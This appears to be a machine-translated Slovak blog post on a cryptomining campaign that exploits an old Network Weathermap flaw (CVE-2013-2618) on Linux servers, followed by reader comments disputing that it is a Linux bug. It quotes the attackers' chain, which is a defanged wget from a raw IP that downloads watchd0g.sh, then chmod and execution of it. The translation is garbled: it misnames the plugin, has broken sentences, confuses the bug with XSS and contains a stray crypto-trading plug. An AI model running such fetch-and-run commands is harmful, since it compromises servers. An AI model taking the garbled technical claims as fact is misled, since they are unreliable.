Toto od baník na kryptomenu pomocou vzdialených počítačov bez oprávnenia ich vlastníkov sa stáva trendom. O tomto druhu situácií som tu už na blogu hovoril niekoľkokrát.
A je to tak, že toto sa už úplne vymklo spod kontroly od okamihu, keď došlo ku kryptomene zaujali pomerne značné miesto a hodnotuĽudia s dostatočnými znalosťami na prístup k počítačom, ktoré narúšajú ich bezpečnosť, si odložili stratu času hľadaním dôležitých informácií alebo bankových účtov, aby získali peňažnú výhodu.
Namiesto toho sa rozhodnú pre najjednoduchšiu vec: prevziať kontrolu nad týmito tímami a spojiť ich v ťažobnej sieti a tiež pre ďalšie úlohy, ktoré bežne robia s botnetom.
Týmto spôsobom vás zvyčajne prečísluje, zameriavajú sa iba na okamžité peniaze, ktoré to generuje.
Vďaka inteligentnému pochopeniu trhových trendov a správnym znalostiam kryptoobchodovania môžete získať veľké výhody.
Je Linux skutočne bezpečný systém?
Mnoho z nás má predstavu, že Linux je takmer dokonalý bezpečný operačný systém, skutočnosť je však taká, že stále má určité chyby.
No mániekedy TrendMicro našiel, v ktorom odhalené nový chyba v systémoch Linux, ktorá poskytla hackerom výhodu ťažby kryptomien pomocou serverov a strojov Linux.
Vo vyhlásení prostredníctvom vášho blogu komentovali nasledujúce:
Prostredníctvom nášho monitorovania súvisiaceho s reakciou na incidenty sme pozorovali pokusy o vniknutie, ktorých ukazovatele sme dokázali korelovať s predchádzajúcou kampaňou na ťažbu kryptomeny, ktorá využívala malware JenkinsMiner.
Rozdiel: Táto kampaň sa zameriava na servery Linux. Je to tiež klasický prípad opätovne použitých zraniteľností, pretože využíva zastaranú bezpečnostnú chybu, ktorej oprava je k dispozícii takmer päť rokov.
V tomto vydaní prostredníctvom vašej analýzy sa podarilo identifikovať dotknuté stránky za toto zlyhanie že Ovplyvňuje hlavne Japonsko, Taiwan, Čínu, USA a Indiu.
Analýza útoku
Prostredníctvom analýzy inteligentná ochranná sieť Trend Micro podrobne popíšem, ako útočníci využívajú túto chybu:
Prevádzkovatelia tejto kampane využívali CVE-2013-2618, datovanú chybu zabezpečenia doplnku Camapi Network Weathermap, ktorý správcovia systému používajú na vizualizáciu sieťovej aktivity.
Pokiaľ ide o dôvod, prečo zneužívajú starú bezpečnostnú chybu: Network Weathermap má zatiaľ iba dve verejne hlásené chyby zabezpečenia, obe od júna 2014.
Títo útočníci môžu využívať nielen bezpečnostnú chybu, pre ktorú je k dispozícii zneužitie, ale aj oneskorenie opravy, ku ktorému dochádza v organizáciách využívajúcich nástroj otvoreného zdroja.
v podstate útok je cez útok XSS:
Fuzzy časťou je cieľ útoku, webový server s portom.
Súbor /plugins/weathermap/configs/conn.php je súbor, ktorý je výsledkom pretrvávajúceho útoku XSS na server / plugins / weathermap / php .
Plus spoj.php Spočiatku vidíme podobnú požiadavku HTTP aplikovanú na stránku s názvom cools.php ".
Program na ťažbu kryptomien je distribuovaný prostredníctvom tejto chyby zabezpečenia z mapy počasia PHP na cieľoch, ktoré sú servermi Linux
Na obrázku vidíte, ako sa útok generuje a je popísaný takto:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Čo to urobí, je odoslanie indikácie na stiahnutie súboru s wget, čo je pomôcka, ktorú majú štandardne nainštalované takmer všetky distribúcie Linuxu.
chmod 775 watchd0g.sh
robí súbor spustiteľným
./watchd0g.sh
To, čo nakoniec urobí, je spustenie súboru na serveri.
našťastie už existuje záplata ( CVE-2013 2618, ) dostupné pre zlyhanie a Môžete si ho stiahnuť z tento odkaz
Si chcete o tom vedieť viac tohto zlyhania môžete navštíviť tento odkaz.
Byť idiotom nie je bezpečné a napriek tomu vás Linux zachráni.
Neaktualizácia bezpečnostných opráv nie je chybou systému Linux. Je chybou, že niektoré spoločnosti kvôli ušetreniu peňazí najímajú idiotov ako správcovia systému,
Ale aj napriek tomu je to OKAMŽITE ZISTENÉ a je vyriešené okamžite, dokonca aj akýkoľvek menší bezpečnostný incident, ako je tento, je zverejnený.
A akú chybu má Linux, že sa jeho aktualizácie neaplikujú? Vývojári GNU / Linux robia svoju prácu vývojom riešení vznikajúcich zraniteľností a ich sprístupňovaním používateľom. Ak lekár predpíše vakcínu proti chrípke a nedostanete ju, ochoriete a stuhnete ... je to chyba lekára?
DesdeLinux Nie je to, čo to bolo, dve správy za sebou s dvoma dôležitými chybami:
1. - Do lepších vývojových editorov vložia softvér, ktorý nie je slobodným softvérom, a zabudnú na ostatných, ktorí sú (sú uvedení v komentároch).
2. - Obrovská správa o vírusoch, ktoré ovplyvňujú iba NON AKTUALIZOVANÉ servery. Ale ak je nejaký linux štandardne aktualizovaný už celé desaťročia. Aby sme vyjadrili strach, akoby bol potrebný sajúci antivírus v štýle Windows. Zdá sa, že sa snažia povedať, že Linux je rovnaký ako Windows, a nie.
Ak je chyba stará a už bola opravená, nie je to ani správa, ani nič. Nehrajte spoločnosti Microsoft a antivírusové spoločnosti, ako sú Trend Micro, Norton, Panda alebo McAffee, ani nedostávajte výplaty.
Mimochodom, vo firme sme niekoľko rokov používali Trend Micro a bol to skutočný zemiak, neporiadok, pretože jeho systém hovoril, že spustiteľný súbor má „stopy“ vírusov (niečo, čo by mohol byť vírus, aj keď to bol nie) a prečo to odstránil (zobral to do adresára, aby sa nespustil), ktorý neumožňoval jeho použitie, a nemal žiadny zoznam povolených položiek na odblokovanie tohto správania bezpečným spustiteľným súborom, ktorý sme potrebovali použiť. Choď do riti. Išlo o firemnú verziu, individuálna verzia mala túto možnosť pridania na zoznam povolených. Patetické.
Neopíš sa tak elegantne.
Tento článok hovorí o bezpečnostnej diere, ktorá vám umožňuje vstúpiť do programu, urobiť ho spustiteľným a spustiť ho, čo je bezpečnostná diera, ktorú musí každý vírus šíriť. Je zrejmé, že ide o vírus, ktorý by potreboval, aby program mal vo svojom kóde. možnosť skenovania počítačov v sieti opakovať operáciu a samokopírovanie. Nerobia to presne preto, lebo v Linuxe sú objavené bezpečnostné diery pokryté bezpečnostnou záplatou, a to myslím tým rozdielom medzi Windows a Linuxom, pretože antivírus nie je nevyhnutný, ale len na zakrytie tejto diery. V systéme Windows je to zložitejšie z niekoľkých dôvodov: 1.- Súbory sa môžu stať spustiteľnými jednoduchým rozšírením, čo eliminuje krok ich zavedenia do postihnutého počítača. 2.- Používatelia neustále inštalujú programy pochybného pôvodu, pretože sú majetkové a musia ich mať bez platenia (nehovorím nič, čo by pre domácu ekonomiku bolo kúpiť MS Office, Photoshop, ... viac ako zdvojnásobiť náklady na počítačové vybavenie). 3.- Windows skôr alebo neskôr prepláchne, používateľ ho odnesie k susedovi, priateľovi, ... ktorý, aby nestrácal čas, všetko naformátuje a nainštaluje Windows Ultimate pomocou aktivačnej opravy, ktorá nie je aktualizovaná alebo že samotná oprava umiestňuje špionážny program. Môže sa stať, že nie je a je to skvelé, ale môže sa stať, že je a má Windows, ktorý špehuje heslá. V článku spomínajú úvodný systém v systéme Linux ovplyvnený touto chybou zabezpečenia. Najjednoduchšou súčasťou všetkého je preto program, ktorý automaticky skenuje sieť a používa ju na svoje kopírovanie a spustenie na serveri. Z tohto dôvodu je uvedené v článok je najdôležitejším krokom každého vírusu: poznanie zraniteľnosti systému pri útoku.
Zlé informácie. Toto nie je chyba v Linuxe, je to chyba v APLIKÁCII PHP, to znamená, že je multiplatformná. Nie je to exkluzívne iba pre systémy s linuxovým jadrom! Ale aj keby aplikácia nebola pre rôzne platformy, nešlo by o chybu systému Linux, bola by to iba aplikácia.
Jadro Linuxu nemá najmenšie zásahy do ochrany pred útokmi skriptovania medzi servermi, ako je tento. Pred zverejnením príspevku aspoň preskúmajte PÄŤ MINÚT, pretože je pravda, že pre každého, kto niečo o niečom vie, bude vyzerať zle.